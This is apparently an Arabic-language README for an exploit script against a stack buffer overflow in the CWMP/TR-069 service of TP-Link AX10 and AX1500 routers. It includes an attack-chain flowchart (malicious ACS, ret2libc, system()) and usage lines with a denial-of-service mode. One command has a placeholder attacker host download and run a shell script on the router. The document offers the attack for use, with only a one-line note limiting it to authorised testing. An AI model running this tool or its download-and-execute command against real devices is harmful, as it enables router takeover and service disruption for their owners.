
ثغرة تجاوز سعة المخزن المؤقت في CWMP لأجهزة TP-Link AX10/AX1500 وتنفيذ تعليمات برمجية عن بُعد
تجاوز سعة المخزن المؤقت المستند إلى المكدس في CWMP (TR-069) مما يؤدي إلى تنفيذ تعليمات برمجية عن بُعد.
| الحقل | القيمة |
|---|---|
| المنتج | TP-Link AX10, AX1500 |
| الإصدارات المتأثرة | AX10 < 1.2.1, AX1500 < 1.3.11 |
| CVSS | 8.6 (عالٍ) |
| النوع | تجاوز سعة المخزن المؤقت في المكدس |
| ناقل الهجوم | CWMP/TR-069 (المنفذ 7547) |
| التأثير | تنفيذ تعليمات برمجية عن بُعد |
flowchart LR
A[Attacker] --> B["Malicious ACS"]
B --> C["SetParameterValues"]
C --> D["Stack Overflow"]
D --> E["Overwrite PC"]
E --> F["ret2libc"]
F --> G["system()"]
G --> H["RCE"]
تقع الثغرة في معالجة عملية cwmp لطلبات SOAP من نوع SetParameterValues. يُستخدم الإدخال لحساب حجم المخزن المؤقت دون التحقق من الحدود.
الاستغلال:
python exploit.py <target_ip> --check-only
python exploit.py 192.168.0.1 --dos
python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"
لا شيء (يستخدم المكتبة القياسية)
للاستخدام في اختبارات الأمان المصرح بها فقط.
| العلامة | الوصف | الافتراضي |
|---|
-p, --port | منفذ CWMP | 7547 |
-c, --command | الأمر لتنفيذ RCE | none |
-t, --timeout | مهلة المقبس | 10 |
--dos | وضع DoS فقط | off |
--check-only | التحقق من قابلية التأثر | off |